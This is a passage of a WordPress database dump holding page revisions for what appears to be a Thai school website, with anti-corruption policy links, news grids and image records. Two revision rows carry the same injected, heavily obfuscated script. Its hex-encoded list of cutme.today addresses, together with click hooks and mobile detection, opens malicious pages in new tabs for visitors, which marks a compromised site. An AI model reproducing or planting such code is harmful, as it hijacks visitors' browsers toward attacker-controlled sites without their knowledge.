-->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แผนการปฏิบัติการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1016\" data-type=\"page\" data-id=\"1016\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_f729cb-3e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f729cb-3e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1036\" data-type=\"page\" data-id=\"1036\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_893939-da\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_893939-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-21 13:45:13','2024-08-21 06:45:13','',871,'http://pakhaeng.ssk.in.th/?p=1044',0,'revision','',0),
(1046,1,'2024-08-21 13:50:32','2024-08-21 06:50:32','<!-- wp:contentviews/grid1 {\"blockId\":\"4bx7msyz\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"offset\":\"0\",\"showCustomField\":false,\"showContent\":false,\"showPagination\":true,\"thumbnailEffect\":\"cveffect-zoomin\",\"responsiveImg\":true,\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"},{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}]} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"bi9dfd8i\",\"whichLayout\":\"layout2\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"offset\":\"0\",\"showTaxonomy\":false,\"showCustomField\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":100},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"responsiveImg\":true,\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}]} /-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข่าวประชาสัมพันธ์','','inherit','closed','closed','','355-revision-v1','','','2024-08-21 13:50:32','2024-08-21 06:50:32','',355,'http://pakhaeng.ssk.in.th/?p=1046',0,'revision','',0),
(1047,1,'2024-08-21 13:55:47','2024-08-21 06:55:47','','Is It a Gift Instagram Post (1)','','inherit','','closed','','is-it-a-gift-instagram-post-1','','','2024-08-21 13:55:47','2024-08-21 06:55:47','',355,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-1-1.png',0,'attachment','image/png',0),
(1049,1,'2024-08-21 13:56:50','2024-08-21 06:56:50','<!-- wp:generateblocks/container {\"uniqueId\":\"bafb5847\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":1047,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-1-1.png\" alt=\"\" class=\"wp-image-1047\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/grid1 